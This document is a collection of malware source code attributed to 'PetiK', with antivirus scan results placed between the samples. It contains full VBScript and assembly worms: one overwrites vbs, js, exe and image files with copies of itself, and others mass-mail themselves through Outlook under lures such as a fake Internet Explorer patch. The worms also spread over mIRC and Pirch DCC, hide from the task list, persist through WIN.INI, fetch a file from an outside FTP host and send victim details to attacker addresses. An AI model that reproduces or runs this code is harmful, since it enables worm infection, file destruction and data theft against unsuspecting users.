msg2.Body = m2 msg2.DeleteAfterSubmit = True msg2.Send Outlook.Quit End If ws.RegWrite "HKLM\Software\PetiK\","OK" End Function Function Mirc(Path) 'On Error Resume Next If Path = "" Then If fso.FileExists("c:\mirc\mirc.ini") Then Path = "c:\mirc" If fso.FileExists("c:\mirc32\mirc.ini") Then Path = "c:\mirc32" PFD = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") PK2 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK") If fso.FileExists(PFD & "\mirc\mirc.ini") Then Path = PFD & "\mirc" If fso.FileExists(PFD & "\mirc32\mirc.ini") Then Path = PFD & "\mirc" End If If Path <> "" Then Set Script = fso.CreateTextFile(Path & "\script.ini", True) Script.writeline "[script]" Script.writeline "n0=on 1:JOIN:#:{" Script.writeline "n1= /if ( $nick == $me ) { halt }" Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick " & PK2 Script.writeline "n3=}" Script.Close ws.RegWrite "HKLM\Software\PetiK\MIRC", "OK" End If End Function Function Pirch(path) On Error Resume Next Set fso = CreateObject("scripting.filesystemobject") Set ws = CreateObject("wscript.shell") If path = "" Then If fso.FileExists("c:\pirch\Pirch32.exe") Then path = "c:\pirch" If fso.FileExists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32" pfDir = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") PK3 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK") If fso.FileExists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe" If fso.FileExists(pfDir & "\pirch32\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe" End If If path <> "" Then Set Script = fso.CreateTextFile(path & "\events.ini", True) Script.WriteLine "[Levels]" Script.WriteLine "Enabled=1" Script.WriteLine "Count=6" Script.WriteLine "Level1=000-Unknowns" Script.WriteLine "000-UnknownsEnabled=1" Script.WriteLine "Level2=100-Level 100" Script.WriteLine "100-Level 100Enabled=1" Script.WriteLine "Level3=200-Level 200" Script.WriteLine "200-Level 200Enabled=1" Script.WriteLine "Level4=300-Level 300" Script.WriteLine " 300-Level 300Enabled=1" Script.WriteLine "Level5=400-Level 400 " Script.WriteLine "400-Level 400Enabled=1" Script.WriteLine "Level6=500-Level 500" Script.WriteLine "500-Level 500Enabled=1" Script.WriteLine "" Script.WriteLine "[000-Unknowns]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[100-Level 100]" Script.WriteLine "User1=*!*@*" Script.WriteLine "UserCount=1" Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick " & PK3 Script.WriteLine "EventCount=1" Script.WriteLine "" Script.WriteLine "[200-Level 200]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[300-Level 300]" Script.WriteLine "UserCount=0"

Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[400-Level 400]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[500-Level 500]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.Close End If ws.RegWrite "HKLM\Software\PetiK\PIRCH", "OK" End Function Sub lecteur On Error Resume Next dim f,f1,fc Set dr = fso.Drives For Each d in dr If d.DriveType=2 or d.DriveType=3 Then liste(d.path&"\") End If Next End Sub Sub infecte(dossier) On Error Resume Next Set f = fso.GetFolder(dossier) Set fc = f.Files For Each f1 in fc ext = fso.GetExtensionName(f1.path) ext = lcase(ext) if (ext="vbs") or (ext="vbe") Set ap=fso.OpenTextFile(f1.path,2,True) ap.Write vbscopie ap.Close elseif (ext="js") or (ext="jse") Then Set ap=fso.OpenTextFile(f1.path,2,True) ap.Write vbscopie ap.Close bn=fso.GetBaseName(f1.path) Set cop=fso.GetFile(f1.path) cop.Copy(dossier&"\"&bn&".vbs") fso.DeleteFile(f1.path) elseif (ext="exe") or (ext="ini") or (ext="gif") or (ext="jpg") or (ext="htm") Then Set cr = fso.CreateTextFile(f1.path&".vbs") cr.Write vbscopie cr.Close fso.DeleteFile(f1.path) elseif (ext="mp3") or (ext="doc") or (ext="xls") or (ext="ppt") or (ext="hlp") Then Set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 End If Next End Sub Sub liste(dossier) On Error Resume Next Set f = fso.GetFolder(dossier) Set sf = f.SubFolders For Each f1 in sf infecte(f1.path) liste(f1.path) Next End Sub

File PetiK.vbs received on 05.16.2009 19:29:07 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result VBS.Lee.Based!IK VBS/Petik Worm/Petik.A1 Worm/VBS.VBS VBS/Pica.Q VBS:Malware-gen VBS/Level Generic.ScriptWorm.C6E6F4BD VBS/Petik Worm.VBS.Email-Worm.Lee-based SCRIPT.WORM.Virus VBS.Smile. VBS/VBSWG!generic VBS/Pica.Q Email-Worm.VBS.Lee-based VBS/LeeBased.E@mm Generic.ScriptWorm.C6E6F4BD VBS.Lee.Based Email-Worm.VBS.Lee-based VBS/Generic VBS/Generic Worm.Petik.A1 Worm:VBS/LoveLetter.gen probably unknown SCRIPT VBS/Lee-based.F VBS.Petik.F@mm VBS.Petik.F Unknown Script Virus VBS/VBSWG-2B VBS.Pet_Tick.A@mm VBS_PETIK.F IRC-Worm.IRC.Generic VBS.Petik.F VBS.Petik.F

Additional information File size: 9766 bytes MD5...: c9103a19fecc9f28dda136a81899d2fe SHA1..: e06a3a4da1ce93f9005977877c85733a057da4e0

comment $ 04/02/2001 => 07/02/2001 DESCRIPTION: S'enregistre comme "Service Process" c'est à dir qu'il n'est pas visible dans la liste des tâches (CTRL+ALT+SUPR). Se copie ensuite dans le dossier SYSTEM sous le nom ie042601.exe : %SysDir%\ie042601.exe Et s'ebregistre dans le fichier WIN.INI : [windows] run=%SysDir%\ie042601.exe (où %SysDir% est le nom par défaut du dossier SYSTEM) Crée le fichier SCRIPT.INI dans C:\ puis va le copier dans C:\MIRC et C:\MIRC32 puis efface l'original dans C:\ Crée EMAIL.VBS dans le répertoire %WinDir% en "lecture seule". Crée WSOCK32.BAT et C:\WIN.DRV dans %WinDir% en "fichier caché". Le programme essaie ensuite de se procurer l'adresse IP du site francophone de yahoo (www.yahoo.fr). Si il y arrive, il éxécute WSOCK32.BAT : - Exécution de EMail.vbs = Envoir du programme à tous les destinataires du carnet d'adresses. - Téléchargement de petik.bmp dans C:\ Modification du papier peint avec l'image "petik.bmp".

Tous les fichiers BMP dur répertoire WINDOWS auront l'attribut caché. POUR COMPILER: tasm32 /M /ML ie042601.asm tlink32 -Tpe -x -aa ie042601.obj,,,import32 $ .386 jumps locals .model flat, stdcall ;KERNEL32.dll extrn CreateFileA:PROC extrn WritePrivateProfileStringA:PROC extrn CloseHandle:PROC extrn CopyFileA:PROC extrn lstrcat:PROC extrn DeleteFileA:PROC extrn ExitProcess:PROC extrn FindFirstFileA:PROC extrn FindNextFileA:PROC extrn FindClose:PROC extrn GetCurrentDirectoryA:PROC extrn GetCurrentProcessId:PROC extrn GetModuleFileNameA:PROC extrn GetModuleHandleA:PROC extrn GetSystemDirectoryA:PROC extrn GetWindowsDirectoryA:PROC extrn RegisterServiceProcess:PROC extrn SetCurrentDirectoryA:PROC extrn SetFileAttributesA:PROC extrn Sleep:PROC extrn WinExec:PROC extrn WriteFile:PROC ;ADVAPI32.dll extrn RegSetValueExA:PROC extrn RegOpenKeyExA:PROC extrn RegCloseKey:PROC ;WSOCK32.dll extrn gethostbyname:PROC

;USER32.dll extrn SystemParametersInfoA:PROC .data szBAT szInfo szOrig szVBS szWinini DIR FileHandle RegHandle SearchHandle octets Copie batfile vbsfile bmpfile drvfile inifile script1 script2 Winini run windows yahoo SOUS_CLE TWP_D TWP_S WPS_D WPS_S FICHIER db db db db db db dd dd dd dd db db db db db db db db db db db db db db db db db db 260 dup (0) 260 dup (0) 260 dup (0) 260 dup (0) 260 dup (0) 260 dup (0) ? ? ? ? "\ie042601.exe",00h "\wsock32.bat",00h "\EMail.vbs",00h "C:\petik.bmp",00h "C:\Win.drv",00h "C:\script.ini",00h "C:\mirc\script.ini",00h "C:\mirc32\script.ini",00h "\\WIN.INI",00h "run",00h "windows",00h "http://www.yahoo.fr",00h "Control Panel\Desktop",00h "TileWallpaper",00h "0",00h "WallpaperStyle",00h "2",00h "*.bmp",00h equ equ equ equ equ equ equ equ equ equ 00000001h 00000002h 00000080h 00000002h 00000001h 40000000h 00000002h 00000001h 80000001h 00000020

FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_NORMAL CREATE_ALWAYS FILE_SHARE_READ GENERIC_WRITE KEY_SET_VALUE REG_SZ HKEY_CURRENT_USER SPI_SETDESKWALLPAPER

max_path equ 260 filetime struc LowDateTime dd ? HighDateTime dd ? filetime ends win32 struc FileAttributes dd ? ; CretionTime filetime ? ; LastAccessTime filetime ? ; LastWriteTime filetime ? ; FileSizeHigh dd ? ; FileSizeLow dd ? ; Reserved0 dd ? ; Reserved1 dd ? ; FileName dd max_path(?) ; AlternativeFileName db 13 dup(?) db 3 dup(?) ; win32 ends CHERCHE win32 <>

Attribut du fichier Date de création Dernier accès Dernière modification Taille du fichier La même chose qu'avant Nom du fichier long ; Nom du fichier court

inid: db "[script]",0dh,0ah db "n0=on 1:JOIN:#:{",0dh,0ah db "n1= /if ( $nick == $me ) { halt }",0dh,0ah db "n2= /.dcc send $nick " szCopie db 260 dup (0) db "",0dh,0ah db "n3=}",00h INITAILLE equ $-inid vbsd: db 'Dim fso,ws,file',0dh,0ah db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah

db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah db 'DEBUT()',0dh,0ah db 'Sub DEBUT()',0dh,0ah db 'EMAIL()',0dh,0ah db 'End Sub',0dh,0ah db 'Sub EMAIL()',0dh,0ah db 'Set OApp=CreateObject("Outlook.Application")',0dh,0ah db 'If OApp="Outlook" Then',0dh,0ah db 'Set Mapi = OApp.GetNameSpace("MAPI")',0dh,0ah db 'For Each AddList In Mapi.AddressLists',0dh,0ah db 'If AddList.AddressEntries.Count <> 0 Then',0dh,0ah db 'For AddListCount = 1 To AddList.AddressEntries.Count',0dh,0ah db 'Set AddListEntry = AddList.AddressEntries(AddListCount)',0dh,0ah db 'Set msg = OApp.CreateItem(0)',0dh,0ah db 'msg.To = AddListEntry.Address',0dh,0ah db 'msg.Subject = "The last patch for Internet Explorer"',0dh,0ah db 'm = "Date : " & date',0dh,0ah db 'm = m & vbCrLf & "A lot of virus and worms use a bug in Internet Explorer"',0dh,0ah db 'm = m & vbCrLf & "This patch allows you to correct this problem"',0dh,0ah db 'm = m & vbCrLf & ""',0dh,0ah db 'msg.Body = m',0dh,0ah db 'msg.Attachments.Add fso.BuildPath(fso.GetSpecialFolder(1),"\ie042601.exe")',0dh,0ah db 'If msg.To <> "" Then',0dh,0ah db 'msg.Send',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'End if',0dh,0ah db 'End Sub',0dh,0ah VBSTAILLE equ $-vbsd batd: db "@echo off",0dh,0ah db "if exist C:\WINDOWS\EMail.vbs start C:\WINDOWS\EMail.vbs",0dh,0ah db "if exist C:\WINDOW\EMail.vbs start C:\WINDOW\EMail.vbs",0dh,0ah db "if exist C:\WIN\EMail.vbs start C:\WIN\EMail.vbs",0dh,0ah db "if exist C:\WIN95\EMail.vbs start C:\WIN95\EMail.vbs",0dh,0ah db "if exist C:\WIN98\EMail.vbs start C:\WIN98\EMail.vbs",0dh,0ah db "if exist C:\WINDOWS.000\EMail.vbs start C:\WINDOWS.000\EMail.vbs",0dh,0ah db "if exist C:\WINDOWS.001\EMail.vbs start C:\WINDOWS.001\EMail.vbs",0dh,0ah db "start ftp -i -v -s:C:\Win.drv",00h BATTAILLE equ $-batd drvd: db "open",0dh,0ah db "members.aol.com",0dh,0ah db "pentasm99",0dh,0ah db "lcd C:\",0dh,0ah db "bin",0dh,0ah db "get petik.bmp",0dh,0ah db "bye",0dh,0ah db "exit",00h DRVTAILLE equ $-drvd .code DEBUT: CACHE:

call push push call push call push push push call push push call push push call push push push call

GetCurrentProcessId 01h eax RegisterServiceProcess 00h GetModuleHandleA 260 offset szOrig eax GetModuleFileNameA 260 offset szCopie GetSystemDirectoryA offset Copie offset szCopie lstrcat 00h offset szCopie offset szOrig CopyFileA

; Ceci permet de cacher le programme ; dans la liste des tâches. ; (CTRL+ALT+SUPR) ; ; On copie ici le fichier original ; ; ; ; ; ; ; ; dans le répertoire SYSTEM ; avec le nom "ie042601.exe" ; ; ; ; ; ;

COPIE:

WIN_INI:push push call push push call push push push push call SCRIPT: push push push push push push push call mov push push push push push call push call suivants push push call push push push call push call EMAIL: push répertoire push call push push call push push push push push push push call mov push push push push push call push call FTP:

260 offset szWinini GetWindowsDirectoryA offset Winini offset szWinini lstrcat offset szWinini offset szCopie offset run offset windows WritePrivateProfileStringA 00h FILE_ATTRIBUTE_NORMAL CREATE_ALWAYS 00h FILE_SHARE_READ GENERIC_WRITE offset inifile CreateFileA [FileHandle],eax 00h offset octets INITAILLE offset inid [FileHandle] WriteFile [FileHandle] CloseHandle

; ; ; ; ; ; ; ; ; ; ;

Pour qu'il s'active à chaque démarrage, on enregistre le nom du fichier dans WIN.INI dans la section [windows] à la ligne "run": [windows] run=%SysDir%\ie042601.exe

; Création du fichier C:\script.ini ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; On copie ce fichier dans les répertoires ; C:\MIRC ; ; ; ; et C:\MIRC32 ; ; ; ; ; Création du fichier EMail.vbs dans le ; ; WINDOWS par défaut en "lecture seule". ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; Création du fichier C:\Win.drv ; en mode "caché" ; ; ; ; ; ; ; ;

push 00h offset script1 offset inifile CopyFileA 00h offset script2 offset inifile CopyFileA offset inifile DeleteFileA 260 offset szVBS GetWindowsDirectoryA offset vbsfile offset szVBS lstrcat 00h FILE_ATTRIBUTE_READONLY CREATE_ALWAYS 00h FILE_SHARE_READ GENERIC_WRITE offset szVBS CreateFileA [FileHandle],eax 00h offset octets VBSTAILLE offset vbsd [FileHandle] WriteFile [FileHandle] CloseHandle

push 00h push FILE_ATTRIBUTE_HIDDEN push CREATE_ALWAYS push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset drvfile call CreateFileA mov [FileHandle],eax push 00h

push push push push call push call EXEC:

offset octets DRVTAILLE offset drvd [FileHandle] WriteFile [FileHandle] CloseHandle

; ; ; ; ; ; ; ; ; ; ; ; ; ; Création du fichier WSOCK32.BAT dans "WINDOWS" ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; Attend 3 minutes, ; puis recommence. ; ; ; ; ; ; ; Fait une pause de 30 secondes. ; Puis continue. ; On cherche la sous-clé "ControlPanel\Desktop" ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; On active "C:\petik.bmp" en papier peint ; ; ; ; ; Vérifie si on peut se procurer l'adresse IP de www.yahoo.fr. OUI => On continue. NON => On refait une pause.

push 260 push offset szBAT call GetWindowsDirectoryA push offset batfile push offset szBAT call lstrcat push 00h push FILE_ATTRIBUTE_NORMAL push CREATE_ALWAYS push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset szBAT call CreateFileA mov [FileHandle],eax push 00h push offset octets push BATTAILLE push offset batd push [FileHandle] call WriteFile push [FileHandle] call CloseHandle jmp CONNECT

PAUSE: push 15 * 1 * 1000 call Sleep CONNECT:push offset yahoo call gethostbyname test eax,eax jz PAUSE BAT: push 01h push offset batfile call WinExec

; Exécute le fichier

ATTEND: push 30 * 1 * 1000 call Sleep BDR: push push push push push call push push push push push push call push push push push push push call push push push push call offset RegHandle KEY_SET_VALUE 00h offset SOUS_CLE HKEY_CURRENT_USER RegOpenKeyExA 02h offset TWP_D offset REG_SZ 00h offset TWP_S [RegHandle] RegSetValueExA 02h offset WPS_D offset REG_SZ 00h offset WPS_S [RegHandle] RegSetValueExA 00h offset bmpfile 00h SPI_SETDESKWALLPAPER SystemParametersInfoA

push 00h

call RegCloseKey DOSSIER:push 260 push offset DIR call GetWindowsDirectoryA push offset DIR call SetCurrentDirectoryA FFF: push push call mov cmp je offset CHERCHE offset FICHIER FindFirstFileA edi,eax eax,-1 FIN ; ; ; ; ; ; ; ; ; ; ;

; On va aller dans le répertoire WINDOWS. On y est. (On peut metre GetCurrentDirectoryA ou encore GetSystemDirectoryA) On va le charger. On utilise les infos du fichier WIN32 On prend l'extension que l'on veut (ici *.txt) On recherche le premier fichier Si il ne trouve pas => -1 et saute au label FIN

MODIF: push 02h ; On modifie ici l'attribut du fichier que l'on push offset CHERCHE.FileName ; a ouvert. On va lui mettre l'attribut caché (02h) call SetFileAttributesA ; et lecture seule (01h) FNF: push offset CHERCHE push edi call FindNextFileA or eax,eax jnz MODIF push offset SearchHandle call FindClose push 00h call ExitProcess ; On recherche les autres fichiers ; ; ; Si il n'en trouve pas, saute au label FIN ; sinon, retourne au label MODIF ; Ferme la session Cherche ; ; FIN DU PROGRAMME ;

FC: FIN:

signature db "I-WORM.PetiK",00h end DEBUT

File PetiK.exe received on 05.16.2009 19:29:07 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.Win32.Petik!IK Win32/PetTick.8192.B Worm/Petik.20 Worm/Win32.Win32 W32/Malware!456d IRC:Generic-008 I-Worm/Petik Generic.Malware.IMg.66DE667B I-Worm.Petik Worm.Win32.Petik.A Win32.Petik.8192 Win32.WormPetik Win32/Buggy.8192 W32/Malware!456d Email-Worm.Win32.Petik W32/PetTick.C@mm Generic.Malware.IMg.66DE667B Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Petik.20 Worm:Win32/Iepatch.A@mm Win32/Petik.A W32/Pet_Tick.8192.B Worm/W32.Petik.8192 W32/IEPatch BAT.Petik.A Worm.Mail.Petik.p W32/Petik Email-Worm.Win32.Petik W95.Pet_Tick.gen W32/PetTick@MM WORM_PET.TICK.C Win32.Worm.Petik.8192 I-Worm.Win32.PetTick.8192.B BAT.Petik.A

Additional information File size: 8192 bytes MD5...: 61ed2fc0c60eac81856e07055621b5aa SHA1..: f172dd91c6e866ad0dfdafd9ea8d6412cf66c42e

' ' ' '

Name : VBS.Study Author : PetiK Language : VBS Date : 15/02/2001 15/02/2001

'VBS/Study by PetiK ©2001. 'Merci à FireBurn, Melissa, Monopoly et Prolin 'Ce programme permet d'étudier la propagation des vers. 'To study the propagation of worms. ' It spread itself with 4 differents Subject, Body and Attached file. ' It send to Panda34@caramail.com the country of infected computer. Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") Set O = CreateObject("Outlook.application") Set mapi = O.GetNameSpace("MAPI") For Each AddList In mapi.AddressLists If AddList.AddressEntries.Count <> 0 Then For AddListCount = 1 To AddList.AddressEntries.Count Set AddListEntry = AddList.AddressEntries(AddListCount) Set msg = O.CreateItem(0) msg.To = AddListEntry.Address Randomize Num = Int((4*Rnd)+1) Set c = fso.GetFile(WScript.ScriptFullName)

If num = 1 Then c.Copy(fso.GetSpecialFolder(0)&"\MyGirlfriend_NUDE.jpg.vbs") msg.Subject = "Hi, how are you ?" msg.Body = "Hi, look at this nice Pic attached !" msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"MyGirlfriend_NUDE.jpg.vbs") elseif num = 2 Then c.Copy(fso.GetSpecialFolder(0)&"\Winword.doc.vbs") msg.Subject = "Important Message" msg.Body = vbCrLf & "Here is that document you asked" msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"Winword.doc.vbs") elseif num = 3 Then c.Copy(fso.GetSpecialFolder(0)&"\MONOPOLY.VBS") msg.Subject = "Bill Gates joke" msg.Body = "Bill Gates is guitly of monopoly. Here is the proof. :-)" msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"MONOPOLY.VBS") elseif num = 4 Then c.Copy(fso.GetSpecialFolder(0)&"\CREATIVE.exe.vbs") msg.Subject = "A great Shockwave flash movie" msg.Body = "Check out this new flash movie that I download just now... It's Great." msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"CREATIVE.exe.vbs") End If If msg.To <> "" Then msg.Send End If Next End If Next Set msg2 = O.CreateItem(0) msg2.BCC = "Panda34@caramail.com; Pentasm99@aol.com" PAYS = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage") msg2.Subject = "VBS/Study arrivant de " & PAYS msg2.Send

File Study.vbs received on 05.11.2009 07:14:06 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.166 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.327 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6497 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.729 7.0.0.125 5611 5611 6.7.6 1.4602 4063 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.00.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.324 8.950.0.1092 None 2009.5.11.1728 4.6.5.0 Last Update 2009.05.11 2009.05.11 2009.05.10 2009.05.08 2009.05.10 2009.05.10 2009.05.10 2009.05.11 2009.05.09 2009.05.11 2009.05.08 2009.05.11 2009.05.10 2009.05.08 2009.05.10 2009.05.11 2009.05.10 2009.05.11 2009.05.11 2009.05.08 2009.05.11 2009.05.10 2009.05.10 2009.05.11 2009.05.10 2009.05.08 2009.05.08 2009.05.10 2009.05.10 2009.05.07 2009.05.11 2009.05.11 2009.05.11 2009.05.09 2009.05.11 2009.05.09 2009.05.11 2009.05.11 2009.05.11 2009.05.10 Result Email-Worm.Win32.Petik!IK VBS/Petik Worm/Petik.B1 Worm/Win32.Win32 VBS/Petik.G@mm VBS:MailWorm-gen I-Worm/Petik Generic.ScriptWorm.AE9B1AEA VBS/Petik.G Worm.Win32.Email-Worm.Petik modification of VBS.Petik VBS/Buggy VBS/Petik.G@mm Email-Worm.Win32.Petik VBS/Petik.G@mm Generic.ScriptWorm.AE9B1AEA Email-Worm.Win32.Petik Email-Worm.Win32.Petik VBS/Generic Worm.Petik.B1 Virus:VBS/Petik.H probably unknown SCRIPT VBS/GenMail.C VBS.Petik.H@mm VBS/Generic.worm VBS.Petik.H VBS.Worm.Spam.Brief VBS/Petik-I Trojan Horse VBS_GENERIC.009 VBS.Worm-Family VBS.Petik.H

Additional information File size: 2033 bytes MD5...: f41a964a3cb2ad29bcee1ce95163c7a9 SHA1..: 5b003c80a78b61e702f80e83bb77cffff4678d8b

;Bastille Virus/Worm par PetiK le 23/04/2001 .model small .code org 100h DEBUT: OUVRE_AUTO: mov ax,3D01h lea dx,FILE int 21h xchg ax,bx xor mov mov int mov lea mov int cx,cx dx,cx ax,4202h 21h cx,AUTOL dx,DAUTO ah,40h 21h

mov ah,3Eh int 21h COPIE_VIRUS: mov ah,3Ch xor cx,cx lea dx,COPIE int 21h xchg ax,bx mov mov lea int ah,40h cx,offset VRAIFIN - offset DEBUT dx,DEBUT 21h

mov ah,3Eh int 21h MIRC: mov ah,3Ch xor cx,cx lea dx,MIRCF1 int 21h xchg ax,bx mov lea mov int cx,MIRCL dx,DMIRC ah,40h 21h

mov ah,3Eh int 21h mov mov int mov mov mov int mov mov int ah,41h dx,offset 21h ah,56h dx,offset di,offset 21h ah,41h dx,offset 21h MIRCF2 MIRCF1 MIRCF2 MIRCF1

DATE: mov ah,2Bh int 21h mov dh,7 mov dl,14 mov cx,2001 int 21h HEURE: mov ah,2Dh int 21h mov cx,0A00h xor dx,dx

int 21h FIN: mov ah,4Ch int 21h db db db db db 'C:\Autoexec.bat',00h 'C:\script.ini',00h 'C:\mirc\script.ini',00h 'C:\Win32.com',00h 'Bastille Virus/Worm by PetiK (c)2001',00h

FILE MIRCF1 MIRCF2 COPIE WHO DAUTO:

AUTOL DMIRC

db '',0dh,0ah db '@echo off',0dh,0ah db 'cls',0dh,0ah db 'echo You''re infected by Bastille Virus (c)2001',0dh,0ah db 'echo.',0dh,0ah db 'echo Don''t panic ! It''s not dangerous, just fatal !!',0dh,0ah db 'pause' equ $-DAUTO db '[script]',0dh,0ah db 'n0=on 1:start:{',0dh,0ah db 'n1= .sreq ignore',0dh,0ah db 'n2=}',0dh,0ah db 'n3=on 1:connect:/rename C:\Win32.com C:\Bastille.com',0dh,0ah db 'n4=on 1:join:#:{',0dh,0ah db 'n5=if ($nick != $me) { dcc send $nick C:\Bastille.com }',0dh,0ah db 'n6=}',0dh,0ah db 'n7=on 1:disconnect:/rename C:\Bastille.com C:\Win32.com' equ $-DMIRC

MIRCL VRAIFIN: end DEBUT

File Bastille.com received on 05.16.2009 10:45:35 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.51.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 